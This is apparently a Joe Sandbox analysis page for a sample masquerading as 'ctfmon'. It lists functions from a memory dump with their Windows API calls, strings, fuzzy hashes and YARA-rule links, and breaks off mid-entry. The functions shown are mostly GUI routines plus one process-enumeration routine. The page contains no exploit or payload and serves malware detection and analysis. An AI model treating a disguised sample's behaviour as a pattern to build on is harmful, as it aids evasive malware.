GetWindowLongA.USER32(?,000000F0), ref: 0041E394
GetParent.USER32(?), ref: 0041E3AD
SetBkMode.GDI32(?,00000002), ref: 0041E3BD
GetClientRect.USER32(?,?), ref: 0041E3CF
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041E3F7
SelectObject.GDI32(?,00000000), ref: 0041E407

Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
Part of subcall function 0041E040: IsWindowEnabled.USER32(?), ref: 0041E095
Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
Part of subcall function 0041E040: SelectObject.GDI32(?,?), ref: 0041E143

GetSysColor.USER32(0000000F), ref: 0041E419
SetBkColor.GDI32(?,00000000), ref: 0041E41D
GetSysColor.USER32(00000012), ref: 0041E425
SetTextColor.GDI32(?,00000000), ref: 0041E429
SendMessageA.USER32(?,00000135,?,?), ref: 0041E43B
SelectObject.GDI32(?,00000000), ref: 0041E443
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041E468
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E4A0
IsWindowEnabled.USER32(?), ref: 0041E4A7
SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041E4BB
GetWindowTextA.USER32(?,?,00000100), ref: 0041E529
SelectObject.GDI32(?,?), ref: 0041E87F
SelectObject.GDI32(?,00000000), ref: 0041E892

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
String ID:
API String ID: 2549663215-0
Opcode ID: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
Instruction ID: 6799aca15d36f123e668f58c1c135d1dd851374628879934b92dffa4031545d3
Opcode Fuzzy Hash: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
Instruction Fuzzy Hash: D2F12875604301AFD310DF68CC85EAFB7E8FB88704F44492DFA8586250E7B9E945CB5A

Function 0041EBB0 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263windowstringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041EBBE
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0041EBEA
HideCaret.USER32(?), ref: 0041EC00
GetWindowRect.USER32(?,?), ref: 0041EC0C
GetParent.USER32(?), ref: 0041EC13
ScreenToClient.USER32(00000000,?), ref: 0041EC27
ScreenToClient.USER32(00000000,?), ref: 0041EC33
GetDC.USER32(00000000), ref: 0041EC36
GetWindowLongA.USER32(?,000000F4), ref: 0041EC68
SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 0041EC95
SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 0041ECB6
GetClassNameA.USER32(00000000,?,00000010), ref: 0041ECC8
lstrcmpA.KERNEL32(?,ComboBox), ref: 0041ECD8
GetParent.USER32(00000000), ref: 0041ECFC
MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 0041ED13
ReleaseDC.USER32(00000000,00000000), ref: 0041ED1B
GetDC.USER32(?), ref: 0041ED26
GetWindowLongA.USER32(00000000,000000F0), ref: 0041ED3C
GetWindow.USER32(00000000,00000005), ref: 0041ED57
GetWindowRect.USER32(00000000,?), ref: 0041ED63
SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0041EDA0
ReleaseDC.USER32(?,00000000), ref: 0041EDB0
ShowCaret.USER32(?), ref: 0041EDB7
GetSystemMetrics.USER32(00000002), ref: 0041EDF8
GetSystemMetrics.USER32(00000002), ref: 0041EE57
GetSystemMetrics.USER32(00000015), ref: 0041EEA8
ReleaseDC.USER32(00000000,00000000), ref: 0041EECA
ShowCaret.USER32(?), ref: 0041EED8

Strings

ComboBox, xrefs: 0041ECD2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
String ID: ComboBox
API String ID: 930961256-1152790111
Opcode ID: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
Instruction ID: e5c296bea3933cf44f53e168aaf778f0ec2db8dd84e81f58de9af8b4068f9cfc
Opcode Fuzzy Hash: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
Instruction Fuzzy Hash: C391B571608301AFD320DB25DC89FBF77A8FB85744F40092DFA4196291D778E946CB5A

Function 0041D2C0 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2CB
GetDC.USER32(00000000), ref: 0041D2D3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041D2E4
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041D2EB
GetSystemMetrics.USER32(00000001), ref: 0041D309
GetSystemMetrics.USER32(00000000), ref: 0041D314
ReleaseDC.USER32(00000000,00000000), ref: 0041D32A
GlobalAddAtomA.KERNEL32(C3d), ref: 0041D344
LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D360
GlobalAddAtomA.KERNEL32(C3dNew), ref: 0041D377
GlobalAddAtomA.KERNEL32(C3dL), ref: 0041D389
GlobalAddAtomA.KERNEL32(C3dH), ref: 0041D396
GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041D3BA
GlobalAddAtomA.KERNEL32(C3dHNew), ref: 0041D3C7
GlobalAddAtomA.KERNEL32(C3dD), ref: 0041D3EB
GetSystemMetrics.USER32(0000002A), ref: 0041D3FE
GetClassInfoA.USER32(00000000,004326E8,?), ref: 0041D441
GetClassInfoA.USER32(00000000,00008002,?), ref: 0041D45E

Strings

C3dNew, xrefs: 0041D372
C3dH, xrefs: 0041D391
C3dL, xrefs: 0041D384
C3dD, xrefs: 0041D3E6
C3dHNew, xrefs: 0041D3C2
C3dLNew, xrefs: 0041D3B5
C3d, xrefs: 0041D339

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
API String ID: 1233821986-3277416593
Opcode ID: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
Instruction ID: e50427c789af92de44b22dfa043ad602546bc15970a851fe98efa0f61ee8e012
Opcode Fuzzy Hash: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
Instruction Fuzzy Hash: A2410FB8A403047AD720AB54DC817EE37A4BF59358F546037DD00972D0D7BC988D9BAA

Function 004293A5 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(Native), ref: 004293C3
RegisterClipboardFormatW.USER32(OwnerLink), ref: 004293CC
RegisterClipboardFormatW.USER32(ObjectLink), ref: 004293D6
RegisterClipboardFormatW.USER32(Embedded Object), ref: 004293E0
RegisterClipboardFormatW.USER32(Embed Source), ref: 004293EA
RegisterClipboardFormatW.USER32(Link Source), ref: 004293F4
RegisterClipboardFormatW.USER32(Object Descriptor), ref: 004293FE
RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00429408
RegisterClipboardFormatW.USER32(FileName), ref: 00429412
RegisterClipboardFormatW.USER32(FileNameW), ref: 0042941C
RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00429426
RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00429430

Strings

Link Source, xrefs: 004293EC
Embed Source, xrefs: 004293E2
Embedded Object, xrefs: 004293D8
Native, xrefs: 004293BE
ObjectLink, xrefs: 004293CE
OwnerLink, xrefs: 004293C5
FileNameW, xrefs: 00429414
FileName, xrefs: 0042940A
RichEdit Text and Objects, xrefs: 00429428
Link Source Descriptor, xrefs: 00429400
Object Descriptor, xrefs: 004293F6
Rich Text Format, xrefs: 0042941E

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
Instruction ID: edf7ca49e2a083f5ac172aeb54de25137a50422174a6044775e6e6b14afce90a
Opcode Fuzzy Hash: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
Instruction Fuzzy Hash: 5C017970B407A45ACB30BF73AC0995BBEE0EEC4B113A24D2FE48597690D6BCA505CF49

Function 0041E040 Relevance: 37.8, APIs: 25, Instructions: 294windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C550: SetBkColor.GDI32(?), ref: 0041C56D
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
Part of subcall function 0041C550: SetBkColor.GDI32(?,?), ref: 0041C607
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C

InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
IsWindowEnabled.USER32(?), ref: 0041E095
InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
SelectObject.GDI32(?,?), ref: 0041E143
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E167
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E187
SelectObject.GDI32(?,?), ref: 0041E19D
PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041E1CB
PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 0041E1EC
InflateRect.USER32(?,000000FF,000000FF), ref: 0041E202
SelectObject.GDI32(?,?), ref: 0041E21C
PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 0041E244
IsWindowEnabled.USER32(?), ref: 0041E24F
SetTextColor.GDI32(?,?), ref: 0041E260
OffsetRect.USER32(?,00000001,00000001), ref: 0041E2EC

Part of subcall function 0041C550: SetBkColor.GDI32(?,00000000), ref: 0041C674

DrawTextA.USER32(?,?,?,?,00000020), ref: 0041E324
GetFocus.USER32 ref: 0041E330
InflateRect.USER32(?,00000001,00000001), ref: 0041E341
IntersectRect.USER32(?,?,?), ref: 0041E352
DrawFocusRect.USER32(?,?), ref: 0041E35E
SelectObject.GDI32(?,00000000), ref: 0041E371

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
String ID:
API String ID: 1611134597-0
Opcode ID: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
Instruction ID: 85d4594a04ea0c67e496ada25f94dcfd0f64e3c57ddc0f24227d28b8a825e15f
Opcode Fuzzy Hash: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
Instruction Fuzzy Hash: CBB13875208201AFD310DFA9CD84EAFB7E8FB88708F404A18FA59D2290D775E9858B56

Function 0041E8D0 Relevance: 30.2, APIs: 20, Instructions: 246COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041E915
CallWindowProcA.USER32(00000000), ref: 0041E93D

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
Instruction ID: 661fead8de9f1cb923f226e17cd232b8dad460699d7947674ae0cd3bb86e6aba
Opcode Fuzzy Hash: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
Instruction Fuzzy Hash: A361487A7443146BD230AB15EC84FFF375CEF86361F500122FE0092391DA29A98686BE

Function 00405A6D Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,?,?,?,00405BA6), ref: 00405A8F
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405AA7
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405AB8
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405AC9
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00405ADA
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00405AEB
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00405AFC

Strings

MonitorFromWindow, xrefs: 00405AB2
USER32, xrefs: 00405A8A
EnumDisplayMonitors, xrefs: 00405AE5
MonitorFromPoint, xrefs: 00405AD4
GetMonitorInfoW, xrefs: 00405AF6
MonitorFromRect, xrefs: 00405AC3
GetSystemMetrics, xrefs: 00405AA1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2547861404
Opcode ID: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
Instruction ID: 86978abfdab4202489ccb7ed7906514a54c6f7a5da0540c36e1280f3304fae6d
Opcode Fuzzy Hash: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
Instruction Fuzzy Hash: 88110070B10611DBC7515F69BCC3A6BBAF4B6987503A40C3FE109E23D0D778684AEE69

Function 0040C7D1 Relevance: 24.3, APIs: 16, Instructions: 319windowkeyboardCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C7D6
GetFocus.USER32 ref: 0040C7E4
GetParent.USER32(?), ref: 0040C85A
GetParent.USER32(?), ref: 0040C86A
GetKeyState.USER32(00000012), ref: 0040C920
IsDialogMessageW.USER32(?,?), ref: 0040C9DC
GetFocus.USER32 ref: 0040C9EE
GetFocus.USER32 ref: 0040C9FB
IsWindow.USER32(?), ref: 0040CA13
GetFocus.USER32 ref: 0040CA1F
IsWindow.USER32(?), ref: 0040CA35
GetFocus.USER32 ref: 0040CA3B
GetKeyState.USER32(00000010), ref: 0040CA6C
GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 0040CA8B
MessageBeep.USER32(00000000), ref: 0040CB21

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
String ID:
API String ID: 1894107442-0
Opcode ID: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
Instruction ID: 03bd421b11a5e9202270e7a8080601ea4524ec8c7accc3ec12f88eb2ceb1b5eb
Opcode Fuzzy Hash: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
Instruction Fuzzy Hash: C8A1AF71A00219DACF24AB65D8C5BBF7B65EF04355F54423BE801B72E1C738DC429AAD

Function 0041D220 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,76944920,7622B510,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D237
GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 0041D260
lstrcmpiA.KERNEL32(?,kanji), ref: 0041D272
GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 0041D295
lstrcmpiA.KERNEL32(?,hangeul), ref: 0041D2A1
LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2B3

Strings

kanjimenu, xrefs: 0041D256
roman, xrefs: 0041D251
hangeul, xrefs: 0041D29B
kanji, xrefs: 0041D266
english, xrefs: 0041D286
windows, xrefs: 0041D25B, 0041D290
hangeulmenu, xrefs: 0041D28B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
API String ID: 1105401458-111014456
Opcode ID: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
Instruction ID: 4abe76d66403d63afbfbe3d47ea13df97799fd1973407ab64f2f1cd089386a62
Opcode Fuzzy Hash: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
Instruction Fuzzy Hash: E201FC757443857AD210E765EC87FEA3F489769B48F212066F900B2192D2B840588BEE

Function 0042A8BB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 340stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A8C0
lstrlenA.KERNEL32(?,?,00000000), ref: 0042A8F1

Strings

`DvP?Dv, xrefs: 0042AB02, 0042AC67

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologlstrlen
String ID: `DvP?Dv
API String ID: 2133942097-2995021381
Opcode ID: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
Instruction ID: 50e1f89d1f17318e9a9081ba82e25bfcf0167d2f1df0f58284690d34baa27448
Opcode Fuzzy Hash: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
Instruction Fuzzy Hash: DAD1C371E00219DFDF11DF94E980AAEBBB1FF44314F64452AE801A7351D738A961CB5A

Function 00403A00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 202processCOMMON

Download Yara Rule

APIs

EnumProcesses.PSAPI(?,00001000,?,PROCS,?,004025AC), ref: 00403A3E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00001000,?,PROCS,?,004025AC), ref: 00403A5B

Strings

PROCS, xrefs: 00403A11
+*&=^^^^--------PROCS, xrefs: 00403AA6

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CreateEnumProcessesSnapshotToolhelp32
String ID: +*&=^^^^--------PROCS$PROCS
API String ID: 3846999141-2662039986
Opcode ID: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
Instruction ID: 624bcb37762edd4edd6f55eff34c223af5f14a6d3ea4ea25fcc202f1aac3f0d4
Opcode Fuzzy Hash: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
Instruction Fuzzy Hash: 1361F3726043065BD720DF64DC81AAF77E9EFD8304F40093EF94597281EA79EA09C76A

Function 0041C290 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041C2A9
GetPropA.USER32(?,?), ref: 0041C2BD
GetPropA.USER32(?,?), ref: 0041C2D1
GetPropA.USER32(?,?), ref: 0041C2E5
GetPropA.USER32(?,?), ref: 0041C2F9
GetPropA.USER32(?,?), ref: 0041C309
IsWindowUnicode.USER32(?), ref: 0041C326
GetClassNameA.USER32(?,?,00000010), ref: 0041C338
lstrcmpiA.KERNEL32(?,edit), ref: 0041C348
SetWindowLongA.USER32(?,000000FC,?), ref: 0041C358
SetPropA.USER32(?,?,00000000), ref: 0041C369

Strings

edit, xrefs: 0041C342

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
